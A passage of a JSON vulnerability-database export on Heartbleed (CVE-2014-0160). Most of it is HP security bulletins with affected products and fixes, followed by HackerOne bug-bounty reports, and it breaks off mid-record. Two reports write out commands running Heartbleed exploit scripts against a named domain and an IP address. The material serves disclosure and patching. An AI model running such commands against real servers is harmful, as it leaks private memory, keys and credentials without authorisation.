"https://vulners.com/securityvulns/SECURITYVULNS:DOC:30506", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04239374\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04239374\r\nVersion: 1\r\n\r\nHPSBMU02999 rev.1 - HP Software Autonomy WorkSite Server (On-Premises\r\nSoftware), Running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-15\r\nLast Updated: 2014-04-15\r\n\r\nPotential Security Impact: Remote disclosure of Information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential vulnerability exists in HP Autonomy WorkSite Server (on-premises\r\nsoftware) running OpenSSL. The vulnerability can be exploited to allow remote\r\ndisclosure of information.\r\n\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences:\r\nCVE-2014-0160 (SSRT101505)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Autonomy WorkSite Server v9.0 SP1 (on-premises software)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided an update to HP Autonomy WorkSite Server v9.0 SP1\r\n(on-premises software) that will address the OpenSSL vulnerability. https://w\r\norksitesupport.autonomy.com/worksite/Scripts/GetDoc.aspx?latest=0%26nrtid=!nr\r\ntdms:0:!session:10.253.1.101:!database:SUPPORT:!document:1351832,1\r\n\r\nNote: after applying the update, HP recommends these additional steps to\r\nassure the vulnerability is addressed.\r\n\r\nRevoke old key pairs that were just superseded\r\nChange all potentially affected passwords\r\nInvalidate all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within HP\r\nAutonomy WorkSite Server (on-premises Software). The bulletin does not apply\r\nto any other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 15 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNNn1wACgkQ4B86/C0qfVm/sQCg+dFq6zytvlfYlmexvErif+Bg\r\nZooAnRDUeVqwXlt8KEGyQrnGheC43CH0\r\n=6WRm\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-04-20T00:00:00", "title": "HP Autonomy WorkSite Server v9.0", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-0160"], "modified": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30479", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30479", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04236062\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04236062\r\nVersion: 3\r\n\r\nHPSBMU02994 rev.3 - HP BladeSystem c-Class Onboard Administrator (OA) running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-25\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP BladeSystem\r\nc-Class Onboard Administrator (OA) running OpenSSL. This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101500\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP BladeSystem c-Class Onboard Administrator (OA) v4.11 and v4.20\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made Onboard Administrator (OA) v4.12 and v4.21 available to resolve\r\nthe vulnerability here:\r\n\r\nGo to:\r\nhttp://www.hp.com/go/oa\r\n\r\nClick "Onboard Administrator Firmware"\r\nSelect "HP BLc3000 Onboard Administrator Option" or "HP BLc7000 Onboard\r\nAdministrator Option"\r\nSelect an appropriate operating system from the list of choices\r\nOn the page, find Firmware 4.12 or v4.21 for download\r\n\r\nNotes\r\n\r\nNo action is required unless the OA is running the firmware versions\r\nexplicitly listed as vulnerable.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\nVersion:2 (rev.2) - 18 April 2014 Added software update information for v4.12\r\nVersion:3 (rev.3) - 25 April 2014 Added software update information for v4.21\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNaq/0ACgkQ4B86/C0qfVmBoACgmzkyr8qMTcs0ADEi4tGXug2j\r\nk4gAoPlR4SOE2FAQjkIMjCpmnAJBKfqj\r\n=LRhJ\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU02994 rev.3 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30499", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30499", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04268240\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04268240\r\nVersion: 1\r\n\r\nHPSBMU03029 rev.1 - HP Insight Control Server Migration running OpenSSL,\r\nRemote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Insight\r\nControl server migration running OpenSSL. This is the OpenSSL vulnerability\r\nknown as "Heartbleed" which could be exploited remotely resulting in\r\ndisclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101543\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Insight Control server migration v7.3 and v7.3.1\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Insight Control server migration. This bulletin will be\r\nrevised when the software updates are released.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhgW8ACgkQ4B86/C0qfVkSPACg6AXj97HaBw46iPIin1VL7YnW\r\nnoQAoJbFj4yAe286o14VdL81VuF3D3xb\r\n=G4bD\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBMU03029 rev.1 - HP Insight Control Server Migration running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30519", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30519", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04271396\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04271396\r\nVersion: 1\r\n\r\nHPSBMU03030 rev.1 - HP Service Pack for ProLiant (SPP) Bundled Software\r\nrunning OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Service Pack\r\nfor ProLiant (SPP) bundled software running OpenSSL. This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101546\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Service Pack for ProLiant (SPP) impacted software products and versions\r\n\r\nHP Onboard Administrator (OA) v4.11 and v4.20\r\n\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\n\r\nHP Integrated Lights-Out 2 (iLO 2) version v2.23 and earlier\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows v4.10 and v4.20 Smart\r\nComponents installer\r\n\r\nHP Smart Update Manager (SUM) v6.0.0 through v6.3.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted HP Service Pack for\r\nProLiant (SPP) bundled software in the following updates and/or HP Security\r\nBulletins.\r\n\r\nHP SPP Component\r\n Update Version or HP Security Bulletin\r\n Software Update or Security Bulletin Location\r\n\r\nHP Service Pack for ProLiant (SPP)\r\n Version:2014.02.0 (B)\r\n http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetai\r\nls/?javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheT\r\nok=com.vignette.cachetoken&javax.portlet.prp_bd9b6997fbc7fc515f4cf4626f5c8d01\r\n=wsrp-navigationalState%3Didx%253D%257CswItem%253DMTX_335408c4a064478d934e942\r\n3c0%257CswEnvOID%253D4024%257CitemLocale%253D%257CswLang%253D%257Cmode%253D5%\r\n257Caction%253DdriverDocument&javax.portlet.tpst=bd9b6997fbc7fc515f4cf4626f5c\r\n8d01&sp4ts.oid=5104019&ac.admitted=1395175158147.876444892.199480143\r\n\r\nHP Onboard Administrator (OA)\r\n HPSBMU02994\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04236062\r\n\r\nHP System Management Homepage (SMH)\r\n HPSBMU02998\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239372\r\n\r\nHP Integrated Lights-Out 2 (iLO 2)\r\n HPSBMU03006\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04244787\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows v4.10 and v4.20 Smart\r\nComponents installer\r\n HPSBMU03032\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04272594\r\n\r\nHP Smart Update Manager (SUM)\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhfjwACgkQ4B86/C0qfVkhMgCg+QcqGt6ad3u/sMCYkEDR9Su6\r\nLjYAn0xSUE51gcQ8Oap+n5GKA8ouoARE\r\n=xVqC\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBMU03030 rev.1 - HP Service Pack for ProLiant (SPP) Bundled Software running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30523", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30523", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "hackerone": [{"lastseen": "2018-11-23T14:56:22", "references": [], "bounty": 200.0, "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/000/065/b5353ff7c53e16da116c7f4e73cc5687ec7d8809_small.png?1542897520", "medium": "https://profile-photos.hackerone-user-content.com/000/000/065/07da688e1d8801d35fdb85376bd9d64e424e6dab_medium.png?1542897520"}, "handle": "mailru", "url": "https://hackerone.com/mailru"}, "bountyState": "resolved", "description": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043d\u0430 portal.sf.mail.ru\r\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c \u043a\u0443\u0441\u043a\u0430\u043c\u0438 \u0440\u0430\u0437\u043c\u0435\u0440\u043e\u043c \u0434\u043e 64\u041a\u0411. \u041f\u0440\u0438\u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0432\u0443\u0441\u0442\u043e\u0440\u043e\u043d\u043d\u044f\u044f, \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0447\u0438\u0442\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043d\u043e \u0438 \u0441\u0435\u0440\u0432\u0435\u0440 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0447\u0430\u0441\u0442\u044c \u0432\u0430\u0448\u0435\u0439 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u043a\u0430\u043a \u044d\u0442\u043e \u0441\u0434\u0435\u043b\u0430\u043b \u0438 \u044f \u0440\u0430\u0434\u0438 \u0447\u0438\u0441\u0442\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430.", "edition": 8, "reporter": "c37hun", "published": "2014-10-23T15:12:13", "title": "Mail.ru: OpenSSL HeartBleed (CVE-2014-0160)", "type": "hackerone", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "h1reporter": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/011/347/b5c7e4f94a58018d532846a6a3b0a552f3478d0a_small.JPG?1527577029"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "hackerone_triager": false, "url": "/c37hun", "username": "c37hun"}, "bulletinFamily": "bugbounty", "cvelist": [], "modified": "2014-12-10T19:29:15", "id": "H1:32570", "href": "https://hackerone.com/reports/32570", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-04T10:02:55", "references": [], "bounty": 0.0, "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/000/060/622f9171a70969f5b0edaf2c826c92ea6e022fb3_small.jpg?1393279055", "medium": "https://profile-photos.hackerone-user-content.com/000/000/060/80201c838134b35b9b1acd99ad8a7a7c214aa374_medium.jpg?1393279055"}, "handle": "concrete5", "url": "https://hackerone.com/concrete5"}, "bountyState": "resolved", "description": "Pls see attachment files for details:\r\npython ssltest.py concrete5.org 443|more\r\n\r\nimpact: critical, pls patch it ASAP\r\n\r\nReferences:\r\nhttps://www.openssl.org/news/secadv_20140407.txt\r\nhttp://heartbleed.com\r\nhttps://github.com/openssl/openssl/commit/96db9023b881d7cd9f379b0c154650d6c108e9a3\r\n~g4mm4\r\nhttps://twitter.com/xchym", "edition": 6, "reporter": "g4mm4", "published": "2014-04-08T11:01:31", "title": "concrete5: https://concrete5.org ::: HeartBleed Attack (CVE-2014-0160)", "type": "hackerone", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "h1reporter": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/002/474/609c151f60e8cc08e850e90a2d644f932e75da31_small.jpg?1533365243"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "hackerone_triager": false, "url": "/g4mm4", "username": "g4mm4"}, "bulletinFamily": "bugbounty", "cvelist": [], "modified": "2014-04-09T00:37:33", "id": "H1:6475", "href": "https://hackerone.com/reports/6475", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-11-23T12:55:41", "references": [], "bounty": 150.0, "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/000/065/b5353ff7c53e16da116c7f4e73cc5687ec7d8809_small.png?1542897520", "medium": "https://profile-photos.hackerone-user-content.com/000/000/065/07da688e1d8801d35fdb85376bd9d64e424e6dab_medium.png?1542897520"}, "handle": "mailru", "url": "https://hackerone.com/mailru"}, "bountyState": "resolved", "description": "MacBook-Pro-Kirill:Pentest isox$ python heartbleed.py 185.30.178.33 -p 1443\r\n\r\ndefribulator v1.16\r\nA tool to test and exploit the TLS heartbeat vulnerability aka heartbleed 